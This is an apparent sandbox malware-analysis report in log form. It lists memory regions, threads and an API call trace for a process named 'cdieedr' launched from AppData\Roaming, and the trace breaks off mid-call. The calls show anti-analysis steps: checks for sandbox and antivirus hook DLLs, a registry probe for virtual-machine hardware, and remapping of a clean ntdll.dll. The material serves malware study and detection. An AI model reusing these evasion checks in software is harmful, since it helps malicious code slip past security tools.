"\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1700 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1701 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1702 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1703 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1704 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1705 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1706 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1707 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1708 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1709 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1710 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1711 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1712 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1713 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1714 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1715 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1716 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1717 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1718 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1719 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 1720 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 1721 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1722 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 1723 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1724 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1725 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1726 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1727 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1728 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1729 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1730 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1731 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1732 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1733 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1734 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1735 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1736 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1737 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1738 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1739 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1740 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1741 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1833 start_va = 0x8c0000 end_va = 0x8e2fff monitored = 0 entry_point = 0x8dbdd8 region_type = mapped_file name = "luafv.sys" filename = "\\Windows\\System32\\drivers\\luafv.sys" (normalized: "c:\\windows\\system32\\drivers\\luafv.sys") Region: id = 1834 start_va = 0x7fef49f0000 end_va = 0x7fef4a16fff monitored = 0 entry_point = 0x7fef4a0b69c region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 2142 start_va = 0x2500000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 2143 start_va = 0x7fef19e0000 end_va = 0x7fef1b5ffff monitored = 0 entry_point = 0x7fef1a180d0 region_type = mapped_file name = "racengn.dll" filename = "\\Windows\\System32\\RacEngn.dll" (normalized: "c:\\windows\\system32\\racengn.dll") Thread: id = 92 os_tid = 0x870 Thread: id = 93 os_tid = 0x86c Thread: id = 94 os_tid = 0x3dc Thread: id = 95 os_tid = 0x598 Thread: id = 96 os_tid = 0x4f8 Thread: id = 97 os_tid = 0x5d4 Thread: id = 98 os_tid = 0x7f0 Thread: id = 99 os_tid = 0x5fc Thread: id = 100 os_tid = 0x5f4 Thread: id = 101 os_tid = 0x5ec Thread: id = 102 os_tid = 0x558 Thread: id = 103 os_tid = 0x460 Thread: id = 104 os_tid = 0x448 Thread: id = 105 os_tid = 0x3b0 Thread: id = 106 os_tid = 0x3a8 Thread: id = 107 os_tid = 0x398 Thread: id = 108 os_tid = 0x2f8 Thread: id = 109 os_tid = 0x2f4 Thread: id = 110 os_tid = 0x2d8 Thread: id = 111 os_tid = 0x2d0 Thread: id = 112 os_tid = 0x2c4 Thread: id = 118 os_tid = 0xea8 Thread: id = 121 os_tid = 0xed8 Thread: id = 122 os_tid = 0xee4 Process: id = "8" image_name = "cdieedr" filename = "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr" page_root = "0x3b9f4000" os_pid = "0xe80" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xe78" cmd_line = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1775 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1776 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1777 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1778 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1779 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1780 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1781 start_va = 0x400000 end_va = 0x781fff monitored = 1 entry_point = 0x424a10 region_type = mapped_file name = "cdieedr" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr") Region: id = 1782 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1783 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1784 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1785 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1786 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1787 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1788 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1789 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1790 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1791 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1792 start_va = 0x1f0000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1793 start_va = 0x75220000 end_va = 0x7527bfff monitored = 0 entry_point = 0x7525f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1794 start_va = 0x75280000 end_va = 0x752befff monitored = 0 entry_point = 0x752ae088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1795 start_va = 0x752f0000 end_va = 0x752f7fff monitored = 0 entry_point = 0x752f20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1796 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1797 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1798 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1799 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 1800 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1801 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1802 start_va = 0x270000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1803 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1804 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1805 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1806 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1807 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1808 start_va = 0x2d0000 end_va = 0x336fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1809 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1810 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1811 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1812 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1813 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1814 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1815 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1816 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1817 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1818 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1819 start_va = 0x1a0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1820 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1821 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1822 start_va = 0x510000 end_va = 0x697fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1823 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1824 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1825 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1826 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1827 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1828 start_va = 0x6a0000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1829 start_va = 0x830000 end_va = 0x1c2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 1830 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1831 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1832 start_va = 0x1c30000 end_va = 0x1daffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1835 start_va = 0x1a0000 end_va = 0x1a5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1836 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1837 start_va = 0x1b0000 end_va = 0x1b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1839 start_va = 0x1c0000 end_va = 0x1d5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Thread: id = 113 os_tid = 0xe84 [0110.259] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="kernel32" | out: DestinationString="kernel32") [0110.259] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x769b0000) returned 0x0 [0110.259] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="user32" | out: DestinationString="user32") [0110.260] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x773b0000) returned 0x0 [0110.290] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="advapi32" | out: DestinationString="advapi32") [0110.290] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x76c20000) returned 0x0 [0110.290] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="shell32" | out: DestinationString="shell32") [0110.290] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x75cb0000) returned 0x0 [0110.298] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0110.298] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x414758 [0110.298] GetKeyboardLayoutList (in: nBuff=1, lpList=0x414758 | out: lpList=0x414758) returned 1 [0110.298] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fb14 | out: TokenHandle=0x18fb14*=0x74) returned 1 [0110.298] GetTokenInformation (in: TokenHandle=0x74, TokenInformationClass=0x19, TokenInformation=0x18fb18, TokenInformationLength=0x14, ReturnLength=0x18fb10 | out: TokenInformation=0x18fb18, ReturnLength=0x18fb10) returned 1 [0110.298] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x18fd54, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0110.298] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0110.299] CreateFileMappingW (hFile=0x78, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x7c [0110.299] MapViewOfFile (hFileMappingObject=0x7c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1c30000 [0110.301] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd58, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0110.301] wcsstr (_Str="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr", _SubStr="7869.vmt") returned 0x0 [0110.301] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x18ff54, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x18ff54, ResultLength=0x0) returned 0x0 [0110.301] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x18ff5c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18ff5c, ReturnLength=0x0) returned 0x0 [0110.301] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0110.301] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0110.301] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0110.301] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x414768 [0110.302] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0110.302] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0110.302] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0110.302] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0110.302] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x414878 [0110.302] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x414878, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x414878, ResultLength=0x18ff50) returned 0x0 [0110.302] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0110.302] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4148b0 [0110.302] NtEnumerateKey (in: 